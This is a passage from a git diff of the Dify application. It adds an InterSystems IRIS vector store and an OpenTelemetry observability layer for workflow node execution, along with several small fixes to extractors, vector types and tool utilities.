cache first (no lock needed for read-only set lookup) + if schema in self._schemas_initialized: + return + + # Slow path: acquire lock and check again (double-checked locking) + with self._lock: + if schema in self._schemas_initialized: + return + + # Get a connection to check/create schema + conn = self._pool[0] if self._pool else self._create_connection() + cursor = conn.cursor() + try: + # Check if schema exists using INFORMATION_SCHEMA + check_sql = """ + SELECT COUNT(*) FROM INFORMATION_SCHEMA.SCHEMATA + WHERE SCHEMA_NAME = ? + """ + cursor.execute(check_sql, (schema,)) # Must be tuple or list + exists = cursor.fetchone()[0] > 0 + + if not exists: + # Schema doesn't exist, create it + cursor.execute(f"CREATE SCHEMA {schema}") + conn.commit() + logger.info("Created schema: %s", schema) + else: + logger.debug("Schema already exists: %s", schema) + + # Add to cache to skip future checks + self._schemas_initialized.add(schema) + + except Exception as e: + conn.rollback() + logger.exception("Failed to ensure schema %s exists", schema) + raise + finally: + cursor.close() + + def close_all(self) -> None: + """Close all connections (application shutdown only).""" + with self._lock: + for conn in self._pool: + try: + conn.close() + except (OSError, RuntimeError): + pass + self._pool.clear() + self._in_use = 0 + self._schemas_initialized.clear() + + +class IrisVector(BaseVector): + """IRIS vector database implementation using native VECTOR type and HNSW indexing.""" + + def __init__(self, collection_name: str, config: IrisVectorConfig) -> None: + super().__init__(collection_name) + self.config = config + self.table_name = f"embedding_{collection_name}".upper() + self.schema = config.IRIS_SCHEMA or "dify" + self.pool = get_iris_pool(config) + + def get_type(self) -> str: + return VectorType.IRIS + + @contextmanager + def _get_cursor(self): + """Context manager for database cursor with connection pooling.""" + conn = self.pool.get_connection() + cursor = conn.cursor() + try: + yield cursor + conn.commit() + except Exception: + conn.rollback() + raise + finally: + cursor.close() + self.pool.return_connection(conn) + + def create(self, texts: list[Document], embeddings: list[list[float]], **kwargs) -> list[str]: + dimension = len(embeddings[0]) + self._create_collection(dimension) + return self.add_texts(texts, embeddings) + + def add_texts(self, documents: list[Document], embeddings: list[list[float]], **_kwargs) -> list[str]: + """Add documents with embeddings to the collection.""" + added_ids = [] + with self._get_cursor() as cursor: + for i, doc in enumerate(documents): + doc_id = doc.metadata.get("doc_id", str(uuid.uuid4())) if doc.metadata else str(uuid.uuid4()) + metadata = json.dumps(doc.metadata) if doc.metadata else "{}" + embedding_str = json.dumps(embeddings[i]) + + sql = f"INSERT INTO {self.schema}.{self.table_name} (id, text, meta, embedding) VALUES (?, ?, ?, ?)" + cursor.execute(sql, (doc_id, doc.page_content, metadata, embedding_str)) + added_ids.append(doc_id) + + return added_ids + + def text_exists(self, id: str) -> bool: # pylint: disable=redefined-builtin + try: + with self._get_cursor() as cursor: + sql = f"SELECT 1 FROM {self.schema}.{self.table_name} WHERE id = ?" + cursor.execute(sql, (id,)) + return cursor.fetchone() is not None + except (OSError, RuntimeError, ValueError): + return False + + def delete_by_ids(self, ids: list[str]) -> None: + if not ids: + return + + with self._get_cursor() as cursor: + placeholders = ",".join(["?" for _ in ids]) + sql = f"DELETE FROM {self.schema}.{self.table_name} WHERE id IN ({placeholders})" + cursor.execute(sql, ids) + + def delete_by_metadata_field(self, key: str, value: str) -> None: + """Delete documents by metadata field (JSON LIKE pattern matching).""" + with self._get_cursor() as cursor: + pattern = f'%"{key}": "{value}"%' + sql = f"DELETE FROM {self.schema}.{self.table_name} WHERE meta LIKE ?" + cursor.execute(sql, (pattern,)) + + def search_by_vector(self, query_vector: list[float], **kwargs: Any) -> list[Document]: + """Search similar documents using VECTOR_COSINE with HNSW index.""" + top_k = kwargs.get("top_k", 4) + score_threshold = float(kwargs.get("score_threshold") or 0.0) + embedding_str = json.dumps(query_vector) + + with self._get_cursor() as cursor: + sql = f""" + SELECT TOP {top_k} id, text, meta, VECTOR_COSINE(embedding, ?) as score + FROM {self.schema}.{self.table_name} + ORDER BY score DESC + """ + cursor.execute(sql, (embedding_str,)) + + docs = [] + for row in cursor.fetchall(): + if len(row) >= 4: + text, meta_str, score = row[1], row[2], float(row[3]) + if score >= score_threshold: + metadata = json.loads(meta_str) if meta_str else {} + metadata["score"] = score + docs.append(Document(page_content=text, metadata=metadata)) + return docs + + def search_by_full_text(self, query: str, **kwargs: Any) -> list[Document]: + """Search documents by full-text using iFind index or fallback to LIKE search.""" + top_k = kwargs.get("top_k", 5) + + with self._get_cursor() as cursor: + if self.config.IRIS_TEXT_INDEX: + # Use iFind full-text search with index + text_index_name = f"idx_{self.table_name}_text" + sql = f""" + SELECT TOP {top_k} id, text, meta + FROM {self.schema}.{self.table_name} + WHERE %ID %FIND search_index({text_index_name}, ?) + """ + cursor.execute(sql, (query,)) + else: + # Fallback to LIKE search (inefficient for large datasets) + query_pattern = f"%{query}%" + sql = f""" + SELECT TOP {top_k} id, text, meta + FROM {self.schema}.{self.table_name} + WHERE text LIKE ? + """ + cursor.execute(sql, (query_pattern,)) + + docs = [] + for row in cursor.fetchall(): + if len(row) >= 3: + metadata = json.loads(row[2]) if row[2] else {} + docs.append(Document(page_content=row[1], metadata=metadata)) + + if not docs: + logger.info("Full-text search for '%s' returned no results", query) + + return docs + + def delete(self) -> None: + """Delete the entire collection (drop table - permanent).""" + with self._get_cursor() as cursor: + sql = f"DROP TABLE {self.schema}.{self.table_name}" + cursor.execute(sql) + + def _create_collection(self, dimension: int) -> None: + """Create table with VECTOR column and HNSW index. + + Uses Redis lock to prevent concurrent creation attempts across multiple + API server instances (api, worker, worker_beat). + """ + cache_key = f"vector_indexing_{self._collection_name}" + lock_name = f"{cache_key}_lock" + + with redis_client.lock(lock_name, timeout=20): # pylint: disable=not-context-manager + if redis_client.get(cache_key): + return + + # Ensure schema exists (idempotent, cached after first call) + self.pool.ensure_schema_exists(self.schema) + + with self._get_cursor() as cursor: + # Create table with VECTOR column + sql = f""" + CREATE TABLE {self.schema}.{self.table_name} ( + id VARCHAR(255) PRIMARY KEY, + text CLOB, + meta CLOB, + embedding VECTOR(DOUBLE, {dimension}) + ) + """ + logger.info("Creating table: %s.%s", self.schema, self.table_name) + cursor.execute(sql) + + # Create HNSW index for vector similarity search + index_name = f"idx_{self.table_name}_embedding" + sql_index = ( + f"CREATE INDEX {index_name} ON {self.schema}.{self.table_name} " + "(embedding) AS HNSW(Distance='Cosine')" + ) + logger.info("Creating HNSW index: %s", index_name) + cursor.execute(sql_index) + logger.info("HNSW index created successfully: %s", index_name) + + # Create full-text search index if enabled + logger.info( + "IRIS_TEXT_INDEX config value: %s (type: %s)", + self.config.IRIS_TEXT_INDEX, + type(self.config.IRIS_TEXT_INDEX), + ) + if self.config.IRIS_TEXT_INDEX: + text_index_name = f"idx_{self.table_name}_text" + language = self.config.IRIS_TEXT_INDEX_LANGUAGE + # Fixed: Removed extra parentheses and corrected syntax + sql_text_index = f""" + CREATE INDEX {text_index_name} ON {self.schema}.{self.table_name} (text) + AS %iFind.Index.Basic + (LANGUAGE = '{language}', LOWER = 1, INDEXOPTION = 0) + """ + logger.info("Creating text index: %s with language: %s", text_index_name, language) + logger.info("SQL for text index: %s", sql_text_index) + cursor.execute(sql_text_index) + logger.info("Text index created successfully: %s", text_index_name) + else: + logger.warning("Text index creation skipped - IRIS_TEXT_INDEX is disabled") + + redis_client.set(cache_key, 1, ex=3600) + + +class IrisVectorFactory(AbstractVectorFactory): + """Factory for creating IrisVector instances.""" + + def init_vector(self, dataset: Dataset, attributes: list, embeddings: Embeddings) -> IrisVector: + if dataset.index_struct_dict: + class_prefix: str = dataset.index_struct_dict["vector_store"]["class_prefix"] + collection_name = class_prefix + else: + dataset_id = dataset.id + collection_name = Dataset.gen_collection_name_by_id(dataset_id) + index_struct_dict = self.gen_index_struct_dict(VectorType.IRIS, collection_name) + dataset.index_struct = json.dumps(index_struct_dict) + + return IrisVector( + collection_name=collection_name, + config=IrisVectorConfig( + IRIS_HOST=dify_config.IRIS_HOST, + IRIS_SUPER_SERVER_PORT=dify_config.IRIS_SUPER_SERVER_PORT, + IRIS_USER=dify_config.IRIS_USER, + IRIS_PASSWORD=dify_config.IRIS_PASSWORD, + IRIS_DATABASE=dify_config.IRIS_DATABASE, + IRIS_SCHEMA=dify_config.IRIS_SCHEMA, + IRIS_CONNECTION_URL=dify_config.IRIS_CONNECTION_URL, + IRIS_MIN_CONNECTION=dify_config.IRIS_MIN_CONNECTION, + IRIS_MAX_CONNECTION=dify_config.IRIS_MAX_CONNECTION, + IRIS_TEXT_INDEX=dify_config.IRIS_TEXT_INDEX, + IRIS_TEXT_INDEX_LANGUAGE=dify_config.IRIS_TEXT_INDEX_LANGUAGE, + ), + ) diff --git a/api/core/rag/datasource/vdb/vector_factory.py b/api/core/rag/datasource/vdb/vector_factory.py index 3a47241293..b9772b3c08 100644 --- a/api/core/rag/datasource/vdb/vector_factory.py +++ b/api/core/rag/datasource/vdb/vector_factory.py @@ -163,7 +163,7 @@ class Vector: from core.rag.datasource.vdb.lindorm.lindorm_vector import LindormVectorStoreFactory return LindormVectorStoreFactory - case VectorType.OCEANBASE: + case VectorType.OCEANBASE | VectorType.SEEKDB: from core.rag.datasource.vdb.oceanbase.oceanbase_vector import OceanBaseVectorFactory return OceanBaseVectorFactory @@ -187,6 +187,10 @@ class Vector: from core.rag.datasource.vdb.clickzetta.clickzetta_vector import ClickzettaVectorFactory return ClickzettaVectorFactory + case VectorType.IRIS: + from core.rag.datasource.vdb.iris.iris_vector import IrisVectorFactory + + return IrisVectorFactory case _: raise ValueError(f"Vector store {vector_type} is not supported.") diff --git a/api/core/rag/datasource/vdb/vector_type.py b/api/core/rag/datasource/vdb/vector_type.py index bc7d93a2e0..bd99a31446 100644 --- a/api/core/rag/datasource/vdb/vector_type.py +++ b/api/core/rag/datasource/vdb/vector_type.py @@ -27,8 +27,10 @@ class VectorType(StrEnum): UPSTASH = "upstash" TIDB_ON_QDRANT = "tidb_on_qdrant" OCEANBASE = "oceanbase" + SEEKDB = "seekdb" OPENGAUSS = "opengauss" TABLESTORE = "tablestore" HUAWEI_CLOUD = "huawei_cloud" MATRIXONE = "matrixone" CLICKZETTA = "clickzetta" + IRIS = "iris" diff --git a/api/core/rag/extractor/entity/extract_setting.py b/api/core/rag/extractor/entity/extract_setting.py index c3bfbce98f..0c42034073 100644 --- a/api/core/rag/extractor/entity/extract_setting.py +++ b/api/core/rag/extractor/entity/extract_setting.py @@ -10,7 +10,7 @@ class NotionInfo(BaseModel): """ credential_id: str | None = None - notion_workspace_id: str + notion_workspace_id: str | None = "" notion_obj_id: str notion_page_type: str document: Document | None = None diff --git a/api/core/rag/extractor/extract_processor.py b/api/core/rag/extractor/extract_processor.py index 0f62f9c4b6..013c287248 100644 --- a/api/core/rag/extractor/extract_processor.py +++ b/api/core/rag/extractor/extract_processor.py @@ -166,7 +166,7 @@ class ExtractProcessor: elif extract_setting.datasource_type == DatasourceType.NOTION: assert extract_setting.notion_info is not None, "notion_info is required" extractor = NotionExtractor( - notion_workspace_id=extract_setting.notion_info.notion_workspace_id, + notion_workspace_id=extract_setting.notion_info.notion_workspace_id or "", notion_obj_id=extract_setting.notion_info.notion_obj_id, notion_page_type=extract_setting.notion_info.notion_page_type, document_model=extract_setting.notion_info.document, diff --git a/api/core/rag/extractor/word_extractor.py b/api/core/rag/extractor/word_extractor.py index 438932cfd6..044b118635 100644 --- a/api/core/rag/extractor/word_extractor.py +++ b/api/core/rag/extractor/word_extractor.py @@ -84,7 +84,7 @@ class WordExtractor(BaseExtractor): image_count = 0 image_map = {} - for rId, rel in doc.part.rels.items(): + for r_id, rel in doc.part.rels.items(): if "image" in rel.target_ref: image_count += 1 if rel.is_external: @@ -121,9 +121,8 @@ class WordExtractor(BaseExtractor): used_at=naive_utc_now(), ) db.session.add(upload_file) - db.session.commit() - # Use rId as key for external images since target_part is undefined - image_map[rId] = f"![image]({dify_config.FILES_URL}/files/{upload_file.id}/file-preview)" + # Use r_id as key for external images since target_part is undefined + image_map[r_id] = f"![image]({dify_config.FILES_URL}/files/{upload_file.id}/file-preview)" else: image_ext = rel.target_ref.split(".")[-1] if image_ext is None: @@ -151,12 +150,11 @@ class WordExtractor(BaseExtractor): used_at=naive_utc_now(), ) db.session.add(upload_file) - db.session.commit() # Use target_part as key for internal images image_map[rel.target_part] = ( f"![image]({dify_config.FILES_URL}/files/{upload_file.id}/file-preview)" ) - + db.session.commit() return image_map def _table_to_markdown(self, table, image_map): diff --git a/api/core/rag/index_processor/constant/built_in_field.py b/api/core/rag/index_processor/constant/built_in_field.py index 9ad69e7fe3..7c270a32d0 100644 --- a/api/core/rag/index_processor/constant/built_in_field.py +++ b/api/core/rag/index_processor/constant/built_in_field.py @@ -15,3 +15,4 @@ class MetadataDataSource(StrEnum): notion_import = "notion" local_file = "file_upload" online_document = "online_document" + online_drive = "online_drive" diff --git a/api/core/tools/errors.py b/api/core/tools/errors.py index b0c2232857..e4afe24426 100644 --- a/api/core/tools/errors.py +++ b/api/core/tools/errors.py @@ -29,6 +29,10 @@ class ToolApiSchemaError(ValueError): pass +class ToolSSRFError(ValueError): + pass + + class ToolCredentialPolicyViolationError(ValueError): pass diff --git a/api/core/tools/utils/message_transformer.py b/api/core/tools/utils/message_transformer.py index ca2aa39861..df322eda1c 100644 --- a/api/core/tools/utils/message_transformer.py +++ b/api/core/tools/utils/message_transformer.py @@ -101,6 +101,8 @@ class ToolFileMessageTransformer: meta = message.meta or {} mimetype = meta.get("mime_type", "application/octet-stream") + if not mimetype: + mimetype = "application/octet-stream" # get filename from meta filename = meta.get("filename", None) # if message is str, encode it to bytes diff --git a/api/core/tools/utils/parser.py b/api/core/tools/utils/parser.py index 6eabde3991..3486182192 100644 --- a/api/core/tools/utils/parser.py +++ b/api/core/tools/utils/parser.py @@ -425,7 +425,7 @@ class ApiBasedToolSchemaParser: except ToolApiSchemaError as e: openapi_error = e - # openai parse error, fallback to swagger + # openapi parse error, fallback to swagger try: converted_swagger = ApiBasedToolSchemaParser.parse_swagger_to_openapi( loaded_content, extra_info=extra_info, warning=warning @@ -436,7 +436,6 @@ class ApiBasedToolSchemaParser: ), schema_type except ToolApiSchemaError as e: swagger_error = e - # swagger parse error, fallback to openai plugin try: openapi_plugin = ApiBasedToolSchemaParser.parse_openai_plugin_json_to_tool_bundle( diff --git a/api/core/workflow/graph_engine/graph_engine.py b/api/core/workflow/graph_engine/graph_engine.py index a4b2df2a8c..2e8b8f345f 100644 --- a/api/core/workflow/graph_engine/graph_engine.py +++ b/api/core/workflow/graph_engine/graph_engine.py @@ -140,6 +140,10 @@ class GraphEngine: pause_handler = PauseCommandHandler() self._command_processor.register_handler(PauseCommand, pause_handler) + # === Extensibility === + # Layers allow plugins to extend engine functionality + self._layers: list[GraphEngineLayer] = [] + # === Worker Pool Setup === # Capture Flask app context for worker threads flask_app: Flask | None = None @@ -158,6 +162,7 @@ class GraphEngine: ready_queue=self._ready_queue, event_queue=self._event_queue, graph=self._graph, + layers=self._layers, flask_app=flask_app, context_vars=context_vars, min_workers=self._min_workers, @@ -196,10 +201,6 @@ class GraphEngine: event_emitter=self._event_manager, ) - # === Extensibility === - # Layers allow plugins to extend engine functionality - self._layers: list[GraphEngineLayer] = [] - # === Validation === # Ensure all nodes share the same GraphRuntimeState instance self._validate_graph_state_consistency() diff --git a/api/core/workflow/graph_engine/layers/__init__.py b/api/core/workflow/graph_engine/layers/__init__.py index 0a29a52993..772433e48c 100644 --- a/api/core/workflow/graph_engine/layers/__init__.py +++ b/api/core/workflow/graph_engine/layers/__init__.py @@ -8,9 +8,11 @@ with middleware-like components that can observe events and interact with execut from .base import GraphEngineLayer from .debug_logging import DebugLoggingLayer from .execution_limits import ExecutionLimitsLayer +from .observability import ObservabilityLayer __all__ = [ "DebugLoggingLayer", "ExecutionLimitsLayer", "GraphEngineLayer", + "ObservabilityLayer", ] diff --git a/api/core/workflow/graph_engine/layers/base.py b/api/core/workflow/graph_engine/layers/base.py index 24c12c2934..780f92a0f4 100644 --- a/api/core/workflow/graph_engine/layers/base.py +++ b/api/core/workflow/graph_engine/layers/base.py @@ -9,6 +9,7 @@ from abc import ABC, abstractmethod from core.workflow.graph_engine.protocols.command_channel import CommandChannel from core.workflow.graph_events import GraphEngineEvent +from core.workflow.nodes.base.node import Node from core.workflow.runtime import ReadOnlyGraphRuntimeState @@ -83,3 +84,29 @@ class GraphEngineLayer(ABC): error: The exception that caused execution to fail, or None if successful """ pass + + def on_node_run_start(self, node: Node) -> None: # noqa: B027 + """ + Called immediately before a node begins execution. + + Layers can override to inject behavior (e.g., start spans) prior to node execution. + The node's execution ID is available via `node._node_execution_id` and will be + consistent with all events emitted by this node execution. + + Args: + node: The node instance about to be executed + """ + pass + + def on_node_run_end(self, node: Node, error: Exception | None) -> None: # noqa: B027 + """ + Called after a node finishes execution. + + The node's execution ID is available via `node._node_execution_id` and matches + the `id` field in all events emitted by this node execution. + + Args: + node: The node instance that just finished execution + error: Exception instance if the node failed, otherwise None + """ + pass diff --git a/api/core/workflow/graph_engine/layers/node_parsers.py b/api/core/workflow/graph_engine/layers/node_parsers.py new file mode 100644 index 0000000000..b6bac794df --- /dev/null +++ b/api/core/workflow/graph_engine/layers/node_parsers.py @@ -0,0 +1,61 @@ +""" +Node-level OpenTelemetry parser interfaces and defaults. +""" + +import json +from typing import Protocol + +from opentelemetry.trace import Span +from opentelemetry.trace.status import Status, StatusCode + +from core.workflow.nodes.base.node import Node +from core.workflow.nodes.tool.entities import ToolNodeData + + +class NodeOTelParser(Protocol): + """Parser interface for node-specific OpenTelemetry enrichment.""" + + def parse(self, *, node: Node, span: "Span", error: Exception | None) -> None: ... + + +class DefaultNodeOTelParser: + """Fallback parser used when no node-specific parser is registered.""" + + def parse(self, *, node: Node, span: "Span", error: Exception | None) -> None: + span.set_attribute("node.id", node.id) + if node.execution_id: + span.set_attribute("node.execution_id", node.execution_id) + if hasattr(node, "node_type") and node.node_type: + span.set_attribute("node.type", node.node_type.value) + + if error: + span.record_exception(error) + span.set_status(Status(StatusCode.ERROR, str(error))) + else: + span.set_status(Status(StatusCode.OK)) + + +class ToolNodeOTelParser: + """Parser for tool nodes that captures tool-specific metadata.""" + + def __init__(self) -> None: + self._delegate = DefaultNodeOTelParser() + + def parse(self, *, node: Node, span: "Span", error: Exception | None) -> None: + self._delegate.parse(node=node, span=span, error=error) + + tool_data = getattr(node, "_node_data", None) + if not isinstance(tool_data, ToolNodeData): + return + + span.set_attribute("tool.provider.id", tool_data.provider_id) + span.set_attribute("tool.provider.type", tool_data.provider_type.value) + span.set_attribute("tool.provider.name", tool_data.provider_name) + span.set_attribute("tool.name", tool_data.tool_name) + span.set_attribute("tool.label", tool_data.tool_label) + if tool_data.plugin_unique_identifier: + span.set_attribute("tool.plugin.id", tool_data.plugin_unique_identifier) + if tool_data.credential_id: + span.set_attribute("tool.credential.id", tool_data.credential_id) + if tool_data.tool_configurations: + span.set_attribute("tool.config", json.dumps(tool_data.tool_configurations, ensure_ascii=False)) diff --git a/api/core/workflow/graph_engine/layers/observability.py b/api/core/workflow/graph_engine/layers/observability.py new file mode 100644 index 0000000000..a674816884 --- /dev/null +++ b/api/core/workflow/graph_engine/layers/observability.py @@ -0,0 +1,169 @@ +""" +Observability layer for GraphEngine. + +This layer creates OpenTelemetry spans for node execution, enabling distributed +tracing of workflow execution. It establishes OTel context during node execution +so that automatic instrumentation (HTTP requests, DB queries, etc.) automatically +associates with the node span. +""" + +import logging +from dataclasses import dataclass +from typing import cast, final + +from opentelemetry import context as context_api +from opentelemetry.trace import Span, SpanKind, Tracer, get_tracer, set_span_in_context +from typing_extensions import override + +from configs import dify_config +from core.workflow.enums import NodeType +from core.workflow.graph_engine.layers.base import GraphEngineLayer +from core.workflow.graph_engine.layers.node_parsers import ( + DefaultNodeOTelParser, + NodeOTelParser, + ToolNodeOTelParser, +) +from core.workflow.nodes.base.node import Node +from extensions.otel.runtime import is_instrument_flag_enabled + +logger = logging.getLogger(__name__) + + +@dataclass(slots=True) +class _NodeSpanContext: + span: "Span" + token: object + + +@final +class ObservabilityLayer(GraphEngineLayer): + """ + Layer that creates OpenTelemetry spans for node execution. + + This layer: + - Creates a span when a node starts execution + - Establishes OTel context so automatic instrumentation associates with the span + - Sets complete attributes and status when node execution ends + """ + + def __init__(self) -> None: + super().__init__() + self._node_contexts: dict[str, _NodeSpanContext] = {} + self._parsers: dict[NodeType, NodeOTelParser] = {} + self._default_parser: NodeOTelParser = cast(NodeOTelParser, DefaultNodeOTelParser()) + self._is_disabled: bool = False + self._tracer: Tracer | None = None + self._build_parser_registry() + self._init_tracer() + + def _init_tracer(self) -> None: + """Initialize OpenTelemetry tracer in constructor.""" + if not (dify_config.ENABLE_OTEL or is_instrument_flag_enabled()): + self._is_disabled = True + return + + try: + self._tracer = get_tracer(__name__) + except Exception as e: + logger.warning("Failed to get OpenTelemetry tracer: %s", e) + self._is_disabled = True + + def _build_parser_registry(self) -> None: + """Initialize parser registry for node types.""" + self._parsers = { + NodeType.TOOL: ToolNodeOTelParser(), + } + + def _get_parser(self, node: Node) -> NodeOTelParser: + node_type = getattr(node, "node_type", None) + if isinstance(node_type, NodeType): + return self._parsers.get(node_type, self._default_parser) + return self._default_parser + + @override + def on_graph_start(self) -> None: + """Called when graph execution starts.""" + self._node_contexts.clear() + + @override + def on_node_run_start(self, node: Node) -> None: + """ + Called when a node starts execution. + + Creates a span and establishes OTel context for automatic instrumentation. + """ + if self._is_disabled: + return + + try: + if not self._tracer: + return + + execution_id = node.execution_id + if not execution_id: + return + + parent_context = context_api.get_current() + span = self._tracer.start_span( + f"{node.title}", + kind=SpanKind.INTERNAL, + context=parent_context, + ) + + new_context = set_span_in_context(span) + token = context_api.attach(new_context) + + self._node_contexts[execution_id] = _NodeSpanContext(span=span, token=token) + + except Exception as e: + logger.warning("Failed to create OpenTelemetry span for node %s: %s", node.id, e) + + @override + def on_node_run_end(self, node: Node, error: Exception | None) -> None: + """ + Called when a node finishes execution. + + Sets complete attributes, records exceptions, and ends the span. + """ + if self._is_disabled: + return + + try: + execution_id = node.execution_id + if not execution_id: + return + node_context = self._node_contexts.get(execution_id) + if not node_context: + return + + span = node_context.span + parser = self._get_parser(node) + try: + parser.parse(node=node, span=span, error=error) + span.end() + finally: + token = node_context.token + if token is not None: + try: + context_api.detach(token) + except Exception: + logger.warning("Failed to detach OpenTelemetry token: %s", token) + self._node_contexts.pop(execution_id, None) + + except Exception as e: + logger.warning("Failed to end OpenTelemetry span for node %s: %s", node.id, e) + + @override + def on_event(self, event) -> None: + """Not used in this layer.""" + pass + + @override + def on_graph_end(self, error: Exception | None) -> None: + """Called when graph execution ends.""" + if self._node_contexts: + logger.warning( + "ObservabilityLayer: %d node spans were not properly ended", + len(self._node_contexts), + ) + self._node_contexts.clear() diff --git a/api/core/workflow/graph_engine/worker.py b/api/core/workflow/graph_engine/worker.py index 73e59ee298..e37a08ae47 100644 --- a/api/core/workflow/graph_engine/worker.py +++ b/api/core/workflow/graph_engine/worker.py @@ -9,6 +9,7 @@ import contextvars import queue import threading import time +from collections.abc import Sequence from datetime import datetime from typing import final from uuid import uuid4 @@ -17,6 +18,7 @@ from flask import Flask from typing_extensions import override from core.workflow.graph import Graph +from core.workflow.graph_engine.layers.base import GraphEngineLayer from core.workflow.graph_events import GraphNodeEventBase, NodeRunFailedEvent from core.workflow.nodes.base.node import Node from libs.flask_utils import preserve_flask_contexts @@ -39,6 +41,7 @@ class Worker(threading.Thread): ready_queue: ReadyQueue, event_queue: queue.Queue[GraphNodeEventBase], graph: Graph, + layers: Sequence[GraphEngineLayer], worker_id: int = 0, flask_app: Flask | None = None, context_vars: contextvars.Context | None = None, @@ -50,6 +53,7 @@ class Worker(threading.Thread): ready_queue: Ready queue containing node IDs ready for execution event_queue: Queue for pushing execution events graph: Graph containing nodes to execute + layers: Graph engine layers for node execution hooks worker_id: Unique identifier for this worker flask_app: Optional Flask application for context preservation context_vars: Optional context variables to preserve in worker thread @@ -63,6 +67,7 @@ class Worker(threading.Thread): self._context_vars = context_vars self._stop_event = threading.Event() self._last_task_time = time.time() + self._layers = layers if layers is not None else [] def stop(self) -> None: """Signal the worker to stop processing.""" @@ -122,20 +127,51 @@ class Worker(threading.Thread): Args: node: The node instance to execute """ - # Execute the node with preserved context if Flask app is provided + node.ensure_execution_id() + + error: Exception | None = None + if self._flask_app and self._context_vars: with preserve_flask_contexts( flask_app=self._flask_app, context_vars=self._context_vars, ): - # Execute the node + self._invoke_node_run_start_hooks(node) + try: + node_events = node.run() + for event in node_events: + self._event_queue.put(event) + except Exception as exc: + error = exc + raise + finally: + self._invoke_node_run_end_hooks(node, error) + else: + self._invoke_node_run_start_hooks(node) + try: node_events = node.run() for event in node_events: - # Forward event to dispatcher immediately for streaming self._event_queue.put(event) - else: - # Execute without context preservation - node_events = node.run() - for event in node_events: - # Forward event to dispatcher immediately for streaming - self._event_queue.put(event) + except Exception as exc: + error = exc + raise + finally: + self._invoke_node_run_end_hooks(node, error) + + def _invoke_node_run_start_hooks(self, node: Node) -> None: + """Invoke on_node_run_start hooks for all layers.""" + for layer in self._layers: + try: + layer.on_node_run_start(node) + except Exception: + # Silently ignore layer errors to prevent disrupting node execution + continue + + def _invoke_node_run_end_hooks(self, node: Node, error: Exception | None) -> None: + """Invoke on_node_run_end hooks for all layers.""" + for layer in self._layers: + try: + layer.on_node_run_end(node, error) + except Exception: + # Silently ignore layer errors to prevent disrupting node execution + continue diff --git a/api/core/workflow/graph_engine/worker_management/worker_pool.py b/api/core/workflow/graph_engine/worker_management/worker_pool.py index a9aada9ea5..5b9234586b 100644 --- a/api/core/workflow/graph_engine/worker_management/worker_pool.py +++ b/api/core/workflow/graph_engine/worker_management/worker_pool.py @@ -14,6 +14,7 @@ from configs import dify_config from core.workflow.graph import Graph from core.workflow.graph_events import GraphNodeEventBase +from ..layers.base import GraphEngineLayer from ..ready_queue import ReadyQueue from ..worker import Worker @@ -39,6 +40,7 @@ class WorkerPool: ready_queue: ReadyQueue, event_queue: queue.Queue[GraphNodeEventBase], graph: Graph, + layers: list[GraphEngineLayer], flask_app: "Flask | None" = None, context_vars: "Context | None" = None, min_workers: int | None = None, @@ -53,6 +55,7 @@ class WorkerPool: ready_queue: Ready queue for nodes ready for execution event_queue: Queue for worker events graph: The workflow graph + layers: Graph engine layers for node execution hooks flask_app: Optional Flask app for context preservation context_vars: Optional context variables min_workers: Minimum number of workers @@ -65,6 +68,7 @@ class WorkerPool: self._graph = graph self._flask_app = flask_app self._context_vars = context_vars + self._layers = layers # Scaling parameters with defaults self._min_workers = min_workers or dify_config.GRAPH_ENGINE_MIN_WORKERS @@ -144,6 +148,7 @@ class WorkerPool: ready_queue=self._ready_queue, event_queue=self._event_queue, graph=self._graph, + layers=self._layers, worker_id=worker_id, flask_app=self._flask_app, context_vars=self._context_vars, diff --git a/api/core/workflow/nodes/base/node.py b/api/core/workflow/nodes/base/node.py index c2e1105971..8ebba3659c 100644 --- a/api/core/workflow/nodes/base/node.py +++ b/api/core/workflow/nodes/base/node.py @@ -244,6 +244,15 @@ class Node(Generic[NodeDataT]): def graph_init_params(self) -> "GraphInitParams": return self._graph_init_params + @property + def execution_id(self) -> str: + return self._node_execution_id + + def ensure_execution_id(self) -> str: + if not self._node_execution_id: + self._node_execution_id = str(uuid4()) + return self._node_execution_id + def _hydrate_node_data(self, data: Mapping[str, Any]) -> NodeDataT: return cast(NodeDataT, self._node_data_type.model_validate(data)) @@ -256,14 +265,12 @@ class Node(Generic[NodeDataT]): raise NotImplementedError def run(self) -> Generator[GraphNodeEventBase, None, None]: - # Generate a single node execution ID to use for all events - if not self._node_execution_id: - self._node_execution_id = str(uuid4()) + execution_id = self.ensure_execution_id() self._start_at = naive_utc_now() # Create and push start event with required fields start_event = NodeRunStartedEvent( - id=self._node_execution_id, + id=execution_id, node_id=self._node_id, node_type=self.node_type, node_title=self.title, @@ -321,7 +328,7 @@ class Node(Generic[NodeDataT]): if isinstance(event, NodeEventBase): # pyright: ignore[reportUnnecessaryIsInstance] yield self._dispatch(event) elif isinstance(event, GraphNodeEventBase) and not event.in_iteration_id and not event.in_loop_id: # pyright: ignore[reportUnnecessaryIsInstance] - event.id = self._node_execution_id + event.id = self.execution_id yield event else: yield event @@ -333,7 +340,7 @@ class Node(Generic[NodeDataT]): error_type="WorkflowNodeError", ) yield NodeRunFailedEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, start_at=self._start_at, @@ -512,7 +519,7 @@ class Node(Generic[NodeDataT]): match result.status: case WorkflowNodeExecutionStatus.FAILED: return NodeRunFailedEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self.id, node_type=self.node_type, start_at=self._start_at, @@ -521,7 +528,7 @@ class Node(Generic[NodeDataT]): ) case WorkflowNodeExecutionStatus.SUCCEEDED: return NodeRunSucceededEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self.id, node_type=self.node_type, start_at=self._start_at, @@ -537,7 +544,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: StreamChunkEvent) -> NodeRunStreamChunkEvent: return NodeRunStreamChunkEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, selector=event.selector, @@ -550,7 +557,7 @@ class Node(Generic[NodeDataT]): match event.node_run_result.status: case WorkflowNodeExecutionStatus.SUCCEEDED: return NodeRunSucceededEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, start_at=self._start_at, @@ -558,7 +565,7 @@ class Node(Generic[NodeDataT]): ) case WorkflowNodeExecutionStatus.FAILED: return NodeRunFailedEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, start_at=self._start_at, @@ -573,7 +580,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: 